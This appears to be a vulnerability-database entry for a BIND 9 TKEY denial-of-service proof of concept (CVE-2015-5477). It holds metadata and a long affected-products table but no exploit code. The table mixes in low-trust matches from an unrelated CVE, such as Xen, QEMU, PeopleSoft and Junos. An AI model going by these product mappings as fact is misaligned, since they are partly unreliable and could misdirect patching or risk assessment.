ID
VAR-E-201505-0004
CVE
cve_id: | CVE-2015-5477 | Trust: 3.6 |
cve_id: | CVE-2015-3456 | Trust: 0.3 |
EDB ID
37721
TITLE
ISC BIND 9 - TKEY (PoC) - Multiple dos Exploit
Trust: 0.6
DESCRIPTION
ISC BIND 9 - TKEY (PoC). CVE-2015-5477 . dos exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | bind9 | model: | - | scope: | - | version: | - | Trust: 1.2 |
vendor: | isc | model: | bind | scope: | eq | version: | 9 | Trust: 1.0 |
vendor: | ubuntu | model: | linux | scope: | eq | version: | 15.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts | scope: | eq | version: | 14.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 12.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 12.04 | Trust: 0.6 |
vendor: | suse | model: | linux enterprise server sp4 ltss | scope: | eq | version: | 10 | Trust: 0.6 |
vendor: | s u s e | model: | opensuse | scope: | eq | version: | 13.2 | Trust: 0.6 |
vendor: | s u s e | model: | opensuse | scope: | eq | version: | 13.1 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 7 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 7 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux hpc node | scope: | eq | version: | 7 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 7 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop client | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 7 | Trust: 0.6 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | juniper | model: | northstar controller application | scope: | eq | version: | 2.1.0 | Trust: 0.6 |
vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.6 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | centos | model: | centos | scope: | eq | version: | 7 | Trust: 0.6 |
vendor: | centos | model: | centos | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | juniper | model: | northstar controller application service pack | scope: | ne | version: | 2.1.01 | Trust: 0.6 |
vendor: | juniper | model: | junos 12.1x44-d20 | scope: | - | version: | - | Trust: 0.6 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.5 | Trust: 0.6 |
vendor: | bind | model: | tkey query | scope: | - | version: | - | Trust: 0.5 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.5.0 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.4.1 | Trust: 0.3 |
vendor: | xen | model: | rc1 | scope: | eq | version: | 4.4.0 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.4.0 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.3.1 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.3.0 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.2.3 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.2.2 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.2.1 | Trust: 0.3 |
vendor: | xen | model: | xen | scope: | eq | version: | 4.2.0 | Trust: 0.3 |
vendor: | ubuntu | model: | linux | scope: | eq | version: | 14.10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise software development kit sp3 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp3 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp2 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp4 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp3 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise software development kit | scope: | eq | version: | 12 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server | scope: | eq | version: | 12 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp2 ltss | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp1 ltss | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise expanded support | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise expanded support | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise expanded support | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise desktop | scope: | eq | version: | 12 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise desktop sp3 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | redhat | model: | openstack for rhel | scope: | eq | version: | 6.07 | Trust: 0.3 |
vendor: | redhat | model: | openstack for rhel | scope: | eq | version: | 5.07 | Trust: 0.3 |
vendor: | redhat | model: | openstack for rhel | scope: | eq | version: | 5.06 | Trust: 0.3 |
vendor: | redhat | model: | openstack | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | redhat | model: | enterprise virtualization | scope: | eq | version: | 3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux virtualization server | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server eus 6.5.z | scope: | - | version: | - | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop multi os client | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | qemu | model: | qemu | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | oracle | model: | peoplesoft enterprise peopletools | scope: | eq | version: | 8.54 | Trust: 0.3 |
vendor: | oracle | model: | peoplesoft enterprise peopletools | scope: | eq | version: | 8.53 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | joyent | model: | smartdatacenter | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | joyent | model: | public cloud | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | ibm | model: | pureapplication system | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | ibm | model: | pureapplication system | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | ibm | model: | powerkvm | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.3.20 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.3.3.0 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.3.1.0 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.3.0.1 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.3.0.0 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.2.1.0 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.2.0.0 | Trust: 0.3 |
vendor: | ibm | model: | flex system manager | scope: | eq | version: | 1.1.0.0 | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r005c10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r005c00spc300 | scope: | - | version: | - | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r005c00 | scope: | - | version: | - | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r003c10spc600 | scope: | - | version: | - | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r003c10cp6001 | scope: | - | version: | - | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r003c10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r003c00spc300 | scope: | - | version: | - | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r003c00 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | helion openstack | scope: | eq | version: | 1.1.0 | Trust: 0.3 |
vendor: | hp | model: | helion openstack | scope: | eq | version: | 1.0.0 | Trust: 0.3 |
vendor: | hp | model: | helion cloudsystem | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | fortinet | model: | fortisandbox | scope: | eq | version: | 2.0.2 | Trust: 0.3 |
vendor: | citrix | model: | xenserver | scope: | eq | version: | 6.0.2 | Trust: 0.3 |
vendor: | citrix | model: | xenserver | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | citrix | model: | xenserver | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | citrix | model: | xenserver | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | citrix | model: | xenserver | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | centos | model: | centos | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | huawei | model: | fusioncompute v100r005c00cp3001 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | fortinet | model: | fortisandbox | scope: | ne | version: | 2.0.3 | Trust: 0.3 |
vendor: | suse | model: | opensuse evergreen | scope: | eq | version: | 11.4 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.1 | Trust: 0.3 |
vendor: | slackware | model: | linux x86 64 -current | scope: | - | version: | - | Trust: 0.3 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 14.1 | Trust: 0.3 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.37 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.37 | Trust: 0.3 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.1 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.1 | Trust: 0.3 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.0 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.0 | Trust: 0.3 |
vendor: | slackware | model: | linux -current | scope: | - | version: | - | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop workstation client | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | oracle | model: | vm server for | scope: | eq | version: | x863.4 | Trust: 0.3 |
vendor: | oracle | model: | vm server for | scope: | eq | version: | x863.3 | Trust: 0.3 |
vendor: | oracle | model: | vm server for | scope: | eq | version: | x863.2 | Trust: 0.3 |
vendor: | oracle | model: | solaris | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | oracle | model: | solaris | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | netapp | model: | clustered data ontap | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | juniper | model: | junos os 12.3x50-d42 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1x49-d20 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1x49-d10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1r1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1f2-s2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.2r4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.2r3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.2r2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.2r1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d26 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d25 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d20 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d18 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d16 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d12 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1r5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1r4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1r3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1r2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1r1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d36 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d30 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d26 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d25 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d20 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d15 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r7 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r6 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3x48-d20 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3x48-d15 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3x48-d10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r9 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r7 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r4.6 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r3.4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r2-s3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r10.2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r1.8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x47-d25 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x47-d20 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x47-d15 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x47-d11 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x47-d10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d36 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d35 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d30 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d25 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d20.5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d20 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d15 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d51 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d50 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d45 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d40 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d35.5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d35 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d34 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d33 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d32 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d30.4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d30 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d26 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d25 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d24 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d20.3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d15 | scope: | - | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos d40 | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | juniper | model: | junos d35 | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | juniper | model: | junos d30 | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | juniper | model: | junos d25 | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | juniper | model: | junos d20 | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | juniper | model: | junos d15 | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | juniper | model: | junos d10 | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | juniper | model: | junos | scope: | eq | version: | 12.1x44 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.6 | Trust: 0.3 |
vendor: | isc | model: | bind p3 | scope: | eq | version: | 9.5.1 | Trust: 0.3 |
vendor: | isc | model: | bind p1 | scope: | eq | version: | 9.5.1 | Trust: 0.3 |
vendor: | isc | model: | bind a2 | scope: | eq | version: | 9.5 | Trust: 0.3 |
vendor: | isc | model: | bind a1 | scope: | eq | version: | 9.5 | Trust: 0.3 |
vendor: | isc | model: | bind p3 | scope: | eq | version: | 9.4.3 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.4.3 | Trust: 0.3 |
vendor: | isc | model: | bind -p1 | scope: | eq | version: | 9.4.1 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.4.1 | Trust: 0.3 |
vendor: | isc | model: | bind rc2 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind rc1 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind b4 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind b3 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind b2 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind b1 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind a6 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind a5 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind a4 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind a3 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind a2 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind a1 | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | isc | model: | bind p1 | scope: | eq | version: | 9.3.6 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.3.6 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.3.5 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.3.4 | Trust: 0.3 |
vendor: | isc | model: | bind rc3 | scope: | eq | version: | 9.3.3 | Trust: 0.3 |
vendor: | isc | model: | bind rc2 | scope: | eq | version: | 9.3.3 | Trust: 0.3 |
vendor: | isc | model: | bind rc1 | scope: | eq | version: | 9.3.3 | Trust: 0.3 |
vendor: | isc | model: | bind b1 | scope: | eq | version: | 9.3.3 | Trust: 0.3 |
vendor: | isc | model: | bind b | scope: | eq | version: | 9.3.3 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.3.3 | Trust: 0.3 |
vendor: | isc | model: | bind -p2 | scope: | eq | version: | 9.3.2 | Trust: 0.3 |
vendor: | isc | model: | bind -p1 | scope: | eq | version: | 9.3.2 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.3.2 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.3.1 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.3 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.8 | Trust: 0.3 |
vendor: | isc | model: | bind rc3 | scope: | eq | version: | 9.2.7 | Trust: 0.3 |
vendor: | isc | model: | bind rc2 | scope: | eq | version: | 9.2.7 | Trust: 0.3 |
vendor: | isc | model: | bind rc1 | scope: | eq | version: | 9.2.7 | Trust: 0.3 |
vendor: | isc | model: | bind b1 | scope: | eq | version: | 9.2.7 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.7 | Trust: 0.3 |
vendor: | isc | model: | bind -p2 | scope: | eq | version: | 9.2.6 | Trust: 0.3 |
vendor: | isc | model: | bind -p1 | scope: | eq | version: | 9.2.6 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.6 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.5 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.4 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.3 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.2 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2.1 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.1.3 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.1.2 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.1.1 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | isc | model: | bind 9.7.1-p2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind p1 | scope: | eq | version: | 9.7.1 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.7.1 | Trust: 0.3 |
vendor: | isc | model: | bind p2 | scope: | eq | version: | 9.7.0 | Trust: 0.3 |
vendor: | isc | model: | bind | scope: | eq | version: | 9.7.0 | Trust: 0.3 |
vendor: | isc | model: | bind 9.6.1-p3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.6.1-p2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.6.0-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.2-p2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.2-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.1b1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0b2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0b1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0a7 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0a6 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0a5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0a4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0a3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.5.0-p2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.4.3b2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.4.3-p5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.4.3-p4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.4.3-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.4.2-p2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | isc | model: | bind 9.3.5-p2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | vios | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | ibm | model: | smartcloud provisioning for software virtual appliance | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | ibm | model: | netezza host management | scope: | eq | version: | 5.3.7.0 | Trust: 0.3 |
vendor: | ibm | model: | lotus protector for mail security | scope: | eq | version: | 2.80 | Trust: 0.3 |
vendor: | ibm | model: | lotus protector for mail security | scope: | eq | version: | 2.8.1.0 | Trust: 0.3 |
vendor: | ibm | model: | i v5r4 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v5r4 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v5r4 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v5r3 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v5r3 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v5r3 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v5r3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | i v5r2 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v5r2 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v5r2 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v5r1 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v5r1 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v5r1 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v4r4 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v4r4 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v4r4 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v4r3 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v4r3 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v4r3 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v4r2 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v4r2 | scope: | eq | version: | 7.1 | Trust: 0.3 |
